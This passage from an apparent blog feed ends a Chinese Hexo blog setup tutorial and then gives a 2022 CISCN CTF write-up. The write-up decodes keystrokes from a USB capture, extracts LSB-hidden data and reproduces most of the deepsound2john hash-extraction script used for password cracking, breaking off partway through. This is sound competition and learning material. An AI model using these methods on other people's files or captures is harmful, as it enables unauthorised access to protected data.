title="4.替换主题"></a>4.替换主题</h2><p>主题在网上一搜就有的是,github上看看,以我使用的pure主题为例,首先将主题文件下载到本地,解压到hexo目录下的themes目录下</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1064096b0a620f1bae4cef9f91e81334.png" alt="截屏2023-02-15 11.34.19"></p><p>然后修改配置文件启用主题即可,在 Hexo 中主要有两份配置文件,其名称都是 _config.yml。 一份位于博客根目录下,主要包含 Hexo 本身的配置;另一份位于主题根目录下,主要用于配置主题相关的选项</p><p><img src="https://img-blog.csdnimg.cn/img_convert/26206c72f1315ceab6d9a5a6a141ed20.png" alt="截屏2023-02-15 11.36.03"></p><ol><li><p>打开<code>_config.yml</code>,找到如下项进行修改</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">language: zh-CN //设置主题为中文版,若使用英文版则不修改</span><br><span class="line">theme: hexo-theme-pure //修改hexo主题</span><br></pre></td></tr></table></figure></li><li><p>在hexo目录下启动终端,使用如下命令清除原来的缓存文件,并渲染新主题</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hexo clean&hexo s</span><br></pre></td></tr></table></figure><p>下图就是已经启用新文件更换主题后效果</p><p><img src="https://img-blog.csdnimg.cn/img_convert/5a0ecd41236626746113484e737dd267.png" alt="截屏2023-02-15 11.40.38"></p></li></ol><h2 id="5-配置主题"><a href="#5-配置主题" class="headerlink" title="5.配置主题"></a>5.配置主题</h2><ol><li>将主题目录中<code> /theme/_source/</code> 下的所有东西复制进博客根目录的<code>source</code>文件夹中</li><li>配置个人信息,在主题目录下的<code>__config.yml</code>是主题的配置文件,根据注释配置即可</li></ol><p><img src="https://img-blog.csdnimg.cn/img_convert/bb4da8bbfeafbac9070f5cb4567b3b8f.png" alt="截屏2023-02-15 12.03.14"></p><h2 id="6-放入文章"><a href="#6-放入文章" class="headerlink" title="6.放入文章"></a>6.放入文章</h2><p>博客文章格式为md,放在<code>source/_posts/</code>目录下即可</p><p><img src="https://img-blog.csdnimg.cn/img_convert/37824531d748a75c3a6ba540be716139.png" alt="截屏2023-02-15 12.05.37"></p><p>因为hexo是静态博客,所以每次对博客做出改变后都需要清除原来的缓存重新生成一次</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hexo clean</span><br><span class="line">hexo g</span><br></pre></td></tr></table></figure><p>这样博客就搭建完成了,只需要上传到GitHub上就OK了</p><h2 id="7-部署至GitHub"><a href="#7-部署至GitHub" class="headerlink" title="7.部署至GitHub"></a>7.部署至GitHub</h2><p>目前博客只是搭建渲染本地可以跑起来了,接下来就需要部署到GitHub pages界面</p><blockquote><p>GitHub Pages是GitHub提供的一个网页寄存服务,于2008年推出。可以用于存放静态网页,包括博客、项目文档甚至整本书</p></blockquote><p>首先肯定是需要有一个GitHub账号,然后去新建一个仓库</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c187a6929c1e369bd6038436e8e1ea6e.png" alt="截屏2023-02-15 13.14.52"></p><p>仓库名必须和自己的用户名一致,这个与域名有关,GitHub pages域名就是:用户名.github.io</p><p><img src="https://img-blog.csdnimg.cn/img_convert/e8e570c2c1518735275d22b7e1856362.png" alt="截屏2023-02-15 13.17.25"></p><p>点击create创建仓库,之后还需要上传静态页面到GitHub,需要修改hexo目录下的配置文件(不是主题下的配置文件)</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">deploy:</span><br><span class="line"> type: git</span><br><span class="line"> repo: # 你的github仓库的URL地址 #repo: [email protected]:用户名/用户名.github.io.git</span><br><span class="line"> branch: master</span><br></pre></td></tr></table></figure><p>当然也不只只有这一种配置方法,这样比较简单,之后可以使用<code>hexo d</code>命令将页面上传至GitHub</p><h2 id="8-配置ssh密钥"><a href="#8-配置ssh密钥" class="headerlink" title="8.配置ssh密钥"></a>8.配置ssh密钥</h2><p>在原来的配置下使用<code>hexo d</code>会发现没吃部署都需要输入GitHub用户名和密码,怎么才能减少麻烦呢,GitHub已经为我们提供了解决方法:使用ssh密钥连接</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -t rsa</span><br><span class="line">cat ~/.ssh/id_rsa.pub</span><br></pre></td></tr></table></figure><p><strong>github添加ssh公钥</strong></p><p>方法一: 在个人profile里添加公钥</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Your profile -> SSH and GPG keys -> New SSH key -> 复制生成的公钥 -></span><br></pre></td></tr></table></figure><p>方法二: 项目的设置里面添加</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Settings -> Deploy keys -> Add Deploy key -> 复制公钥 -> 勾选Allow write access -> Add new</span><br></pre></td></tr></table></figure><p>设置好之后可以可以使用以下命令测试</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -T [email protected]</span><br></pre></td></tr></table></figure><p>认证成功说明配置正确,重新使用命令<code>hexo d</code>,这样整个博客就搭建完成并部署到GitHub了,使用域名:用户名.github.io 访问即可,如果使用部署时仍然需要输入用户名和密码则是配置文件配置有问题,重新检查上一步配置文件是否正确即可</p><p><img src="https://img-blog.csdnimg.cn/15d8c95769a243dfa0dc576b62174266.png" alt="在这里插入图片描述"></p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/85078d1b776d429eba18a5bc29b178a9.png" alt="在这里插入图片描述"></p>
<h1 id="Hexo博客"><a href="#Hexo博客" class=</summary>
<category term="博客搭建" scheme="https://oceansec.github.io/categories/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/"/>
<category term="博客搭建" scheme="https://oceansec.github.io/tags/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/"/>
</entry>
<entry>
<title>2022 CISCN 创新能力实践赛初赛WP</title>
<link href="https://oceansec.github.io/2023/12/05/2022%20CISCN%20%E5%88%9B%E6%96%B0%E8%83%BD%E5%8A%9B%E5%AE%9E%E8%B7%B5%E8%B5%9B%E5%88%9D%E8%B5%9BWP/"/>
<id>https://oceansec.github.io/2023/12/05/2022%20CISCN%20%E5%88%9B%E6%96%B0%E8%83%BD%E5%8A%9B%E5%AE%9E%E8%B7%B5%E8%B5%9B%E5%88%9D%E8%B5%9BWP/</id>
<published>2023-12-05T02:59:04.842Z</published>
<updated>2022-08-13T12:37:33.630Z</updated>
<content type="html"><![CDATA[<blockquote><p>WP来自齐鲁师范学院网络安全社团<br><img src="https://img-blog.csdnimg.cn/68def0711ab44a01be039f449062fe4b.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAT2NlYW46KQ==,size_20,color_FFFFFF,t_70,g_se,x_16" alt="请添加图片描述"></p></blockquote><h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h2 id="ez-usb"><a href="#ez-usb" class="headerlink" title="ez_usb"></a>ez_usb</h2><p><img src="https://img-blog.csdnimg.cn/img_convert/0ad1b368bd3c43be93222e5645548c2b.gif" alt="图片"></p><p>文件-导出特定分组</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br></pre></td><td class="code"><pre><span class="line">tshark -r 2.8.1.pcapng -T fields -e usb.capdat > 2.8.1.txt</span><br><span class="line"></span><br><span class="line">import os,sys</span><br><span class="line"></span><br><span class="line">normalKeys = {</span><br><span class="line"></span><br><span class="line"> "04":"a", "05":"b", "06":"c", "07":"d", "08":"e",</span><br><span class="line"></span><br><span class="line"> "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",</span><br><span class="line"></span><br><span class="line"> "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",</span><br><span class="line"></span><br><span class="line"> "13":"p", "14":"q", "15":"r", "16":"s", "17":"t",</span><br><span class="line"></span><br><span class="line"> "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",</span><br><span class="line"></span><br><span class="line"> "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",</span><br><span class="line"></span><br><span class="line"> "22":"5", "23":"6","24":"7","25":"8","26":"9",</span><br><span class="line"></span><br><span class="line"> "27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t",</span><br><span class="line"></span><br><span class="line"> "2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\",</span><br><span class="line"></span><br><span class="line"> "32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".",</span><br><span class="line"></span><br><span class="line"> "38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>",</span><br><span class="line"></span><br><span class="line"> "3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>",</span><br><span class="line"></span><br><span class="line"> "44":"<F11>","45":"<F12>"}</span><br><span class="line"></span><br><span class="line">shiftKeys = {</span><br><span class="line"></span><br><span class="line"> "04":"A", "05":"B", "06":"C", "07":"D", "08":"E",</span><br><span class="line"></span><br><span class="line"> "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",</span><br><span class="line"></span><br><span class="line"> "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",</span><br><span class="line"></span><br><span class="line"> "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",</span><br><span class="line"></span><br><span class="line"> "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",</span><br><span class="line"></span><br><span class="line"> "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",</span><br><span class="line"></span><br><span class="line"> "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",</span><br><span class="line"></span><br><span class="line"> "28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>",</span><br><span class="line"></span><br><span class="line"> "2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":""",</span><br><span class="line"></span><br><span class="line"> "34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",</span><br><span class="line"></span><br><span class="line"> "3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",</span><br><span class="line"></span><br><span class="line"> "41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">#pcapFilePath = sys.argv[1]</span><br><span class="line"></span><br><span class="line">#os.system("tshark -r "+pcapFilePath+" -T fields -e usb.capdata | sed '/^\s*$/d' > out.txt")</span><br><span class="line"></span><br><span class="line">output = []</span><br><span class="line"></span><br><span class="line">keys = open('./2.8.1.txt')</span><br><span class="line"></span><br><span class="line">for line in keys:</span><br><span class="line"></span><br><span class="line"> line = ''.join(line[i:i+2]+':' for i in range(0,len(line)-1,2)).strip(':') </span><br><span class="line"></span><br><span class="line"> try:</span><br><span class="line"></span><br><span class="line"> if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":</span><br><span class="line"></span><br><span class="line"> continue</span><br><span class="line"></span><br><span class="line"> if line[6:8] in normalKeys.keys():</span><br><span class="line"></span><br><span class="line"> output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']</span><br><span class="line"></span><br><span class="line"> else:</span><br><span class="line"></span><br><span class="line"> output += ['[unknown]']</span><br><span class="line"></span><br><span class="line"> except:</span><br><span class="line"></span><br><span class="line"> pass</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">keys.close()</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">flag=0</span><br><span class="line"></span><br><span class="line">#print("".join(output))</span><br><span class="line"></span><br><span class="line">for i in range(len(output)):</span><br><span class="line"></span><br><span class="line"> try:</span><br><span class="line"></span><br><span class="line"> a=output.index('<DEL>')</span><br><span class="line"></span><br><span class="line"> del output[a]</span><br><span class="line"></span><br><span class="line"> del output[a-1]</span><br><span class="line"></span><br><span class="line"> except:</span><br><span class="line"></span><br><span class="line"> pass</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">for i in range(len(output)):</span><br><span class="line"></span><br><span class="line"> try:</span><br><span class="line"></span><br><span class="line"> if output[i]=="<CAP>":</span><br><span class="line"></span><br><span class="line"> flag+=1</span><br><span class="line"></span><br><span class="line"> output.pop(i)</span><br><span class="line"></span><br><span class="line"> if flag==2:</span><br><span class="line"></span><br><span class="line"> flag=0</span><br><span class="line"></span><br><span class="line"> if flag!=0:</span><br><span class="line"></span><br><span class="line"> output[i]=output[i].upper()</span><br><span class="line"></span><br><span class="line"> except:</span><br><span class="line"></span><br><span class="line"> pass</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">print ('output :' + "".join(output))</span><br><span class="line"></span><br><span class="line">os.system("rm -rf 2.8.1.txt")</span><br></pre></td></tr></table></figure><p>得到加密的压缩包,同样方式提取</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c20540e4d89a5ef7cfe0007669a16f23.gif" alt="图片"></p><p>得到压缩包密码</p><p><code>output :35c535765e50074a</code></p><p>解密得到flag</p><p><code>flag{20de17cc-d2c1-4b61-bebd-41159ed7172d}</code></p><h2 id="everlasting-night"><a href="#everlasting-night" class="headerlink" title="everlasting_night"></a>everlasting_night</h2><p>stegsolve 查看图片发现</p><p><img src="https://img-blog.csdnimg.cn/img_convert/4db01ce28c8e7a13d0f3053e0fca32bf.gif" alt="图片"></p><p>得到一个密码,考虑 lsb 隐写加密</p><p><img src="https://img-blog.csdnimg.cn/img_convert/bc2fde86a93d1e241d7e2e61398accf4.gif" alt="图片"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 lsb.py extract everlasting_night.png out.txt f78dcd383f1b574b</span><br></pre></td></tr></table></figure><p>得到 zip,发现被加密,想到 png 后面还有一串字符没用</p><p><img src="/2023/12/05/2022%20CISCN%20%E5%88%9B%E6%96%B0%E8%83%BD%E5%8A%9B%E5%AE%9E%E8%B7%B5%E8%B5%9B%E5%88%9D%E8%B5%9BWP/" alt="图片"></p><p>经过各种尝试最后发现是 md5,somd5 解密就好了得到压缩包密码</p><p><code>ohhWh04m1</code></p><p><img src="https://img-blog.csdnimg.cn/img_convert/b337fa77ecd911a2b5e895684bcd4594.gif" alt="图片"></p><p>010 打开发现 png 但是不是正常的图片,gimp 打开看一下</p><p><img src="https://img-blog.csdnimg.cn/img_convert/a6d5938806d8c8b8a9798f83fdcf1155.gif" alt="图片"></p><p><code>flag{607f41da-e849-4c0b-8867-1b3c74536cc4}</code></p><h2 id="babydisk"><a href="#babydisk" class="headerlink" title="babydisk"></a>babydisk</h2><p>附件是 vmdk 文件,可以直接拿 Diskgenius 挂载,也可以使用 winhex 等等。这里我使用 DiskGenius 挂载</p><p><img src="https://img-blog.csdnimg.cn/img_convert/06bc5218170a42aee8e4caf18031f9dd.gif" alt="图片"></p><p>挂载后能看到有个 wav</p><p><img src="https://img-blog.csdnimg.cn/img_convert/af82c585e9972d3ea1b9e4aa8273fdca.gif" alt="图片"></p><p>右击-复制到桌面可以提取出来,010 查看没啥东西,wav 的隐写有 deepsound 和 silenteye 或者还有其他,先用deepsound 试一下,用 deepsound 打开如果能显示存在密码说明就是 deepsound 隐写的</p><p><img src="https://img-blog.csdnimg.cn/img_convert/8e7f0ac272d2cd4466942efe49e9b0ed.gif" alt="图片"></p><p>现在的问题是需要一个密码,那就谷歌搜一下</p><p><img src="https://img-blog.csdnimg.cn/img_convert/9b83ad8e1b06b250a83be213a1436ffb.gif" alt="图片"></p><p>里面的文章恰好完成了我们的需求</p><p><a href="https://blog.csdn.net/weixin_45696568/article/details/118573215">https://blog.csdn.net/weixin_45696568/article/details/118573215</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python3</span><br><span class="line"></span><br><span class="line">'''</span><br><span class="line"></span><br><span class="line">deepsound2john extracts password hashes from audio files containing encrypted</span><br><span class="line"></span><br><span class="line">data steganographically embedded by DeepSound (http://jpinsoft.net/deepsound/).</span><br><span class="line"></span><br><span class="line">This method is known to work with files created by DeepSound 2.0.</span><br><span class="line"></span><br><span class="line">Input files should be in .wav format. Hashes can be recovered from audio files</span><br><span class="line"></span><br><span class="line">even after conversion from other formats, e.g.,</span><br><span class="line"></span><br><span class="line"> ffmpeg -i input output.wav</span><br><span class="line"></span><br><span class="line">Usage:</span><br><span class="line"></span><br><span class="line"> python3 deepsound2john.py carrier.wav > hashes.txt</span><br><span class="line"></span><br><span class="line"> john hashes.txt</span><br><span class="line"></span><br><span class="line">This software is copyright (c) 2018 Ryan Govostes <[email protected]>, and</span><br><span class="line"></span><br><span class="line">it is hereby released to the general public under the following terms:</span><br><span class="line"></span><br><span class="line">Redistribution and use in source and binary forms, with or without</span><br><span class="line"></span><br><span class="line">modification, are permitted.</span><br><span class="line"></span><br><span class="line">'''</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">import logging</span><br><span class="line"></span><br><span class="line">import os</span><br><span class="line"></span><br><span class="line">import sys</span><br><span class="line"></span><br><span class="line">import textwrap</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def decode_data_low(buf):</span><br><span class="line"></span><br><span class="line"> return buf[::2]</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def decode_data_normal(buf):</span><br><span class="line"></span><br><span class="line"> out = bytearray()</span><br><span class="line"></span><br><span class="line"> for i in range(0, len(buf), 4):</span><br><span class="line"></span><br><span class="line"> out.append((buf[i] & 15) << 4 | (buf[i + 2] & 15))</span><br><span class="line"></span><br><span class="line"> return out</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def decode_data_high(buf):</span><br><span class="line"></span><br><span class="line"> out = bytearray()</span><br><span class="line"></span><br><span class="line"> for i in range(0, len(buf), 8):</span><br><span class="line"></span><br><span class="line"> out.append((buf[i] & 3) << 6 | (buf[i + 2] & 3) << 4 \</span><br><span class="line"></span><br><span class="line"> | (buf[i + 4] & 3) << 2 | (buf[i + 6] & 3))</span><br><span class="line"></span><br><span class="line"> return out</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def is_magic(buf):</span><br><span class="line"></span><br><span class="line"># This is a more efficient way of testing for the `DSCF` magic header without</span><br><span class="line"></span><br><span class="line"># decoding the whole buffer</span><br><span class="line"></span><br><span class="line"> return (buf[0] & 15) == (68 >> 4) and (buf[2] & 15) == (68 & 15) \</span><br><span class="line"></span><br><span class="line"> and (buf[4] & 15) == (83 >> 4) and (buf[6] & 15) == (83 & 15) \</span><br><span class="line"></span><br><span class="line"> and (buf[8] & 15) == (67 >> 4) and (buf[10] & 15) == (67 & 15) \</span><br><span class="line"></span><br><span class="line"> and (buf[12] & 15) == (70 >> 4) and (buf[14] & 15) == (70 & 15)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def is_wave(buf):</span><br><span class="line"></span><br><span class="line"> return buf[0:4] == b'RIFF' and buf[8:12] == b'WAVE'</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def process_deepsound_file(f):</span><br><span class="line"></span><br><span class="line"> bname = os.path.basename(f.name)</span><br><span class="line"></span><br><span class="line"> logger = logging.getLogger(bname)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"># Check if it's a .wav file</span><br><span class="line"></span><br><span class="line"> buf = f.read(12)</span><br><span class="line"></span><br><span class="line"> if not is_wave(buf):</span><br><span class="line"></span><br><span class="line"> global convert_warn</span><br><span class="line"></span><br><span class="line"> logger.error('file not in .wav format')</span><br><span class="line"></span><br><span class="line"> convert_warn = True</span><br><span class="line"></span><br><span class="line"> return</span><br><span class="line"></span><br><span class="line"> f.seek(0, os.SEEK_SET)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"># Scan for the marker...</span><br><span class="line"></span><br><span 